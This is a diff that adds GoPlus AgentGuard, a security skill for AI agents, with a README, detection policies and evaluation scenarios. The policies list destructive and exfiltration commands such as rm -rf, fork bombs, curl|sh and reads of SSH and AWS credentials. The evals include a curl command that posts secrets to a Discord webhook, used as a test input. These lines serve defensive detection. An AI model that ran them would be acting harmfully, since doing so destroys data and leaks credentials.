iflytek · goplusbot · May 12, 2026
diff --git a/.agents/skills/agentguard/.clawignore b/.agents/skills/agentguard/.clawignore
@@ -0,0 +1,6 @@
+node_modules/
+scripts/node_modules/
+scripts/package-lock.json
+scripts/data/registry.json
+*.log
+.DS_Store
diff --git a/.agents/skills/agentguard/README.md b/.agents/skills/agentguard/README.md
@@ -0,0 +1,62 @@
+# GoPlus AgentGuard
+
+AI Agent Security Guard — protect your AI agents from dangerous commands, data leaks, and malicious skills.
+
+## Features
+
+- **Code Scanning** — 24 detection rules covering shell injection, credential leaks, prompt injection, Web3 exploits, and more
+- **Action Evaluation** — Real-time allow/deny/confirm decisions for runtime actions (network, exec, file, Web3)
+- **Trust Registry** — Manage skill trust levels with capability-based access control
+- **Security Patrol** — Automated daily security checks for OpenClaw environments
+- **Agent Health Checkup** — Full security posture assessment with visual HTML report and shareable lobster mascot
+- **Audit Logging** — Full security event trail with reporting
+
+## Usage
+
+```
+/agentguard scan <path>          — Scan code for security risks
+/agentguard action <description> — Evaluate runtime action safety
+/agentguard patrol [run|setup|status] — Daily security patrol
+/agentguard trust <subcommand>   — Manage skill trust levels
+/agentguard report               — View security event audit log
+/agentguard config <level>       — Set protection level (strict/balanced/permissive)
+/agentguard checkup              — Run agent health checkup with visual HTML report
+```
+
+## Agent Health Checkup 🦞
+
+Run a full security health check on your AI agent and get a visual report in the browser:
+
+```
+/agentguard checkup
+```
+
+Evaluates 4 dimensions (5 if Web3 usage is detected):
+
+| Dimension | What's checked |
+|-----------|---------------|
+| **Skill & Code Safety** | Scan all installed skills with 24 detection rules |
+| **Credential & Secrets** | File permissions on `~/.ssh/`, `~/.gnupg/`, leaked keys and API tokens |
+| **Network & System** | Dangerous open ports, suspicious cron jobs, sensitive env vars |
+| **Runtime Protection** | Security hooks, audit log, whether skills have been scanned |
+| **Web3 Safety** | Wallet-draining patterns, unlimited approvals, GoPlus API config (only if Web3 detected) |
+
+Scores are combined into a composite 0–100 health score with a tier:
+
+| Score | Tier | Lobster |
+|-------|------|---------|
+| 90–100 | **S** | 💪 Jacked — 5 random muscular variants |
+| 70–89 | **A** | 🛡️ Healthy — 5 random armored variants |
+| 50–69 | **B** | ☕ Tired — 5 random sleepy variants |
+| 0–49 | **F** | 🚨 Critical — 5 random sick variants |
+
+The report opens automatically in your browser. It includes a downloadable summary image with tier-specific copy in Chinese and English.
+
+## Requirements
+
+- Node.js 18+
+- Optional: GoPlus API credentials for enhanced Web3 transaction simulation
+
+## Author
+
+Built by [GoPlus Security](https://gopluslabs.io) — the leading Web3 security infrastructure provider.
diff --git a/.agents/skills/agentguard/SKILL.md b/.agents/skills/agentguard/SKILL.md
diff --git a/.agents/skills/agentguard/action-policies.md b/.agents/skills/agentguard/action-policies.md
@@ -0,0 +1,234 @@
+# Action Evaluation Policies Reference
+
+Detailed detector rules and policies for the `action` subcommand.
+
+## Network Request Detector
+
+### Webhook / Exfiltration Domains (auto-block if not in allowlist)
+
+| Domain | Service |
+|--------|---------|
+| `discord.com` / `discordapp.com` | Discord webhooks |
+| `api.telegram.org` | Telegram bot API |
+| `hooks.slack.com` | Slack webhooks |
+| `webhook.site` | Webhook testing |
+| `requestbin.com` | Request inspection |
+| `pipedream.com` | Workflow automation |
+| `ngrok.io` / `ngrok-free.app` | Tunneling |
+| `beeceptor.com` | API mocking |
+| `mockbin.org` | HTTP mocking |
+
+### High-Risk TLDs
+
+`.xyz`, `.top`, `.tk`, `.ml`, `.ga`, `.cf`, `.gq`, `.work`, `.click`, `.link`
+
+Domains with these TLDs are flagged as medium risk. POST/PUT to high-risk TLD escalates to high risk.
+
+### Request Body Secret Scanning
+
+Scan request body for sensitive data. Priority determines risk level:
+
+| Secret Type | Priority | Risk Level | Decision |
+|------------|----------|------------|----------|
+| Private Key (`0x` + 64 hex) | 100 | critical | DENY |
+| Mnemonic (12-24 BIP-39 words) | 100 | critical | DENY |
+| SSH Private Key (`-----BEGIN.*PRIVATE KEY`) | 90 | critical | DENY |
+| AWS Secret Key (`[A-Za-z0-9/+=]{40}` near AWS context) | 80 | high | CONFIRM |
+| AWS Access Key (`AKIA[0-9A-Z]{16}`) | 70 | high | CONFIRM |
+| GitHub Token (`gh[pousr]_[A-Za-z0-9_]{36,}`) | 70 | high | CONFIRM |
+| Bearer/JWT Token (`ey[A-Za-z0-9-_]+\.ey[A-Za-z0-9-_]+`) | 60 | medium | CONFIRM |
+| API Secret (generic `api.*secret` patterns) | 50 | medium | CONFIRM |
+| DB Connection String (`(postgres|mysql|mongodb)://`) | 50 | medium | CONFIRM |
+| Password in Config (`password\s*[:=]`) | 40 | low | CONFIRM |
+
+### Network Decision Logic
+
+1. Invalid URL -> DENY (high)
+2. Domain in webhook list & not in allowlist -> DENY (high)
+3. Body contains private key / mnemonic / SSH key -> DENY (critical)
+4. Body contains other secrets -> risk based on priority
+5. High-risk TLD & not in allowlist -> CONFIRM (medium)
+6. POST/PUT to untrusted domain -> escalate medium to high
+7. Domain in allowlist -> ALLOW (low)
+
+## Command Execution Detector
+
+### Dangerous Commands (always DENY, critical)
+
+| Command | Risk |
+|---------|------|
+| `rm -rf` / `rm -fr` | Recursive delete |
+| `mkfs` | Format filesystem |
+| `dd if=` | Raw disk write |
+| `:(){:\|:&};:` (and space variants) | Fork bomb (regex: `:\s*\(\s*\)\s*\{.*:\s*\|\s*:.*&.*\}`) |
+| `chmod 777` / `chmod -R 777` | World-writable permissions |
+| `> /dev/sda` | Disk overwrite |
+| `mv /* ` | Move root contents |
+| `wget\|sh` / `curl\|sh` | Download and execute |
+| `wget\|bash` / `curl\|bash` | Download and execute |
+
+### Sensitive Data Access (high)
+
+| Command | Target |
+|---------|--------|
+| `cat /etc/passwd` | User database |
+| `cat /etc/shadow` | Password hashes |
+| `cat ~/.ssh` | SSH keys |
+| `cat ~/.aws` | AWS credentials |
+| `cat ~/.kube` | Kubernetes config |
+| `cat ~/.npmrc` | npm auth tokens |
+| `cat ~/.netrc` | Network credentials |
+| `printenv` / `env` / `set` | All environment variables |
+
+### System Modification Commands (medium)
+
+`sudo`, `su`, `chown`, `chmod`, `chgrp`, `useradd`, `userdel`, `groupadd`, `passwd`, `visudo`, `systemctl`, `service`, `init`, `shutdown`, `reboot`, `halt`
+
+### Network Commands (medium)
+
+`curl`, `wget`, `nc`/`netcat`/`ncat`, `ssh`, `scp`, `rsync`, `ftp`, `sftp`
+
+### Shell Injection Patterns (medium)
+
+| Pattern | Description |
+|---------|-------------|
+| `; command` | Command separator |
+| `\| command` | Pipe |
+| `` `command` `` | Backtick execution |
+| `$(command)` | Command substitution |
+| `&& command` | Conditional chain |
+| `\|\| command` | Or chain |
+
+### Sensitive Environment Variables
+
+Flag env vars containing: `API_KEY`, `SECRET`, `PASSWORD`, `TOKEN`, `PRIVATE`, `CREDENTIAL`
+
+### Safe Command Allowlist
+
+Commands matching the safe list are allowed without restriction, **unless** they contain shell metacharacters (`;`, `|`, `&`, `` ` ``, `$`, `(`, `)`, `{`, `}`) or access sensitive paths.
+
+| Category | Commands |
+|----------|----------|
+| **Basic** | `ls`, `echo`, `pwd`, `whoami`, `date`, `hostname`, `uname`, `tree`, `du`, `df`, `sort`, `uniq`, `diff`, `cd` |
+| **Read** | `cat`, `head`, `tail`, `wc`, `grep`, `find`, `which`, `type` |
+| **File ops** | `mkdir`, `cp`, `mv`, `touch` |
+| **Git** | `git status`, `git log`, `git diff`, `git branch`, `git show`, `git remote`, `git clone`, `git checkout`, `git pull`, `git fetch`, `git merge`, `git add`, `git commit`, `git push` |
+| **Package managers** | `npm install`, `npm run`, `npm test`, `npm ci`, `npm start`, `npx`, `yarn`, `pnpm`, `pip install`, `pip3 install` |
+| **Build & run** | `node`, `python`, `python3`, `tsc`, `go build`, `go run`, `go version`, `cargo build`, `cargo run`, `cargo test`, `make`, `rustc --version`, `java -version` |
+
+### Exec Decision Logic
+
+1. Matches fork bomb (regex) -> DENY (critical)
+2. Matches dangerous command -> DENY (critical)
+3. Matches safe command (no metacharacters, no sensitive paths) -> ALLOW (low)
+4. Exec not allowed in capability model -> CONFIRM (non-critical) — balanced mode prompts user
+5. Matches sensitive data access -> flag HIGH
+6. Matches system command -> flag MEDIUM
+7. Matches network command -> flag MEDIUM
+8. Contains shell injection pattern -> flag MEDIUM
+9. Sensitive env vars passed -> flag evidence
+
+**Note**: In balanced mode, non-critical blocked commands (step 4) trigger a user prompt instead of a hard block. Only critical threats (steps 1-2) are always denied regardless of protection level.
+
+## Default Policies
+
+```
+secret_exfil:
+  private_key: DENY (always block)
+  mnemonic: DENY (always block)
+  api_secret: CONFIRM (require user approval)
+
+exec_command: DENY (default, unless capability allows)
+
+web3:
+  unlimited_approval: CONFIRM
+  unknown_spender: CONFIRM
+  user_not_present: CONFIRM
+
+network:
+  untrusted_domain: CONFIRM
+  body_contains_secret: DENY
+```
+
+## Capability Presets
+
+### none (Most Restrictive)
+```json
+{
+  "network_allowlist": [],
+  "filesystem_allowlist": [],
+  "exec": "deny",
+  "secrets_allowlist": []
+}
+```
+
+### read_only
+```json
+{
+  "network_allowlist": [],
+  "filesystem_allowlist": ["./**"],
+  "exec": "deny",
+  "secrets_allowlist": []
+}
+```
+
+### trading_bot
+```json
+{
+  "network_allowlist": [
+    "api.binance.com", "api.bybit.com", "api.okx.com",
+    "api.coinbase.com", "*.dextools.io", "*.coingecko.com"
+  ],
+  "filesystem_allowlist": ["./config/**", "./logs/**"],
+  "exec": "deny",
+  "secrets_allowlist": ["*_API_KEY", "*_API_SECRET"],
+  "web3": {
+    "chains_allowlist": [1, 56, 137, 42161],
+    "rpc_allowlist": ["*"],
+    "tx_policy": "confirm_high_risk"
+  }
+}
+```
+
+### defi
+```json
+{
+  "network_allowlist": ["*"],
+  "filesystem_allowlist": [],
+  "exec": "deny",
+  "secrets_allowlist": [],
+  "web3": {
+    "chains_allowlist": [1, 56, 137, 42161, 10, 8453, 43114],
+    "rpc_allowlist": ["*"],
+    "tx_policy": "confirm_high_risk"
+  }
+}
+```
+
+## GoPlus Integration
+
+The `action-cli.ts decide` command integrates with the [GoPlus Security API](https://docs.gopluslabs.io/) for enhanced Web3 action evaluation. GoPlus provides three checks:
+
+| Check | Description | Triggers |
+|-------|-------------|----------|
+| **Phishing Site Detection** | Checks if the transaction origin URL is a known phishing site | `PHISHING_ORIGIN` → DENY (critical) |
+| **Address Security** | Checks if the target address is blacklisted, associated with phishing, stealing attacks, or honeypots | `MALICIOUS_ADDRESS` → DENY (critical), `HONEYPOT_RELATED` → flag (high) |
+| **Transaction Simulation** | Simulates the transaction to detect balance changes, approval changes, and risk indicators | `UNLIMITED_APPROVAL` → CONFIRM (high), `SIMULATION_FAILED` → flag (medium) |
+
+### Environment Variables
+
+```
+GOPLUS_API_KEY=your_key         # Required for simulation
+GOPLUS_API_SECRET=your_secret   # Required for simulation
+```
+
+Phishing site detection and address security checks work without API keys. Transaction simulation requires configured credentials.
+
+### Degradation Strategy
+
+When GoPlus is unavailable (no API keys, network errors, rate limiting):
+
+1. The `SIMULATION_UNAVAILABLE` or `SIMULATION_FAILED` risk tag is set
+2. Phishing and address checks that fail are silently skipped
+3. The decision falls back to **policy-based rules only** (capability model, webhook detection, secret scanning)
+4. For `web3_tx` and `web3_sign` without GoPlus, the skill should apply prompt-based rules and note the limitation in the output
diff --git a/.agents/skills/agentguard/evals.md b/.agents/skills/agentguard/evals.md
@@ -0,0 +1,82 @@
+# GoPlus AgentGuard Evaluation Scenarios
+
+These scenarios verify that GoPlus AgentGuard correctly detects threats and handles commands.
+
+## Scenario 1: Scan Vulnerable Code
+
+**Input:**
+```
+/agentguard scan examples/vulnerable-skill
+```
+
+**Expected behavior:**
+- Risk level: **CRITICAL**
+- Total findings: **20+** (across JS, Solidity, and Markdown files)
+- Key detections: SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER, READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN, NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL, OBFUSCATION, PROMPT_INJECTION, WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY, TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
+- Offers to register the skill in the trust registry
+
+## Scenario 2: Evaluate Dangerous Command
+
+**Input:**
+```
+/agentguard action "rm -rf /"
+```
+
+**Expected behavior:**
+- Decision: **DENY**
+- Risk level: **critical**
+- Risk tags include: DANGEROUS_COMMAND
+- Clear explanation of why the command is blocked
+
+## Scenario 3: Evaluate Network Exfiltration
+
+**Input:**
+```
+/agentguard action "curl -X POST https://discord.com/api/webhooks/123/abc -d '{\"content\": \"secrets\"}'"
+```
+
+**Expected behavior:**
+- Decision: **DENY** or **CONFIRM** (depending on protection level)
+- Risk tags include: WEBHOOK_DOMAIN or EXFIL_RISK
+- Identifies Discord webhook as data exfiltration vector
+
+## Scenario 4: Trust Registry CRUD
+
+**Input sequence:**
+```
+/agentguard trust list
+/agentguard trust attest --id test-skill --source /path/to/skill --version 1.0.0 --hash abc --trust-level restricted --preset read_only --reviewed-by user
+/agentguard trust lookup --source /path/to/skill
+/agentguard trust revoke --source /path/to/skill --reason "no longer needed"
+/agentguard trust list
+```
+
+**Expected behavior:**
+- Initial list may be empty or show existing records
+- Attestation succeeds with "restricted" trust level and "read_only" capabilities
+- Lookup returns the attested record with correct fields
+- Revocation succeeds
+- Final list no longer shows the revoked skill as trusted
+
+## Scenario 5: Security Report
+
+**Input:**
+```
+/agentguard report
+```
+
+**Expected behavior:**
+- If hooks are enabled: shows recent security events from `~/.agentguard/audit.jsonl`
+- If no log exists: informs user that no events have been recorded and suggests enabling hooks
+
+## Scenario 6: Protection Level Configuration
+
+**Input:**
+```
+/agentguard config strict
+/agentguard config
+```
+
+**Expected behavior:**
+- Sets protection level to "strict" in `~/.agentguard/config.json`
+- Second command shows current config: `{"level": "strict"}`
diff --git a/.agents/skills/agentguard/package.json b/.agents/skills/agentguard/package.json
@@ -0,0 +1,8 @@
+{
+  "private": true,
+  "type": "module",
+  "dependencies": {
+    "@goplus/agentguard": "^1.0.6",
+    "open": "11.0.0"
+  }
+}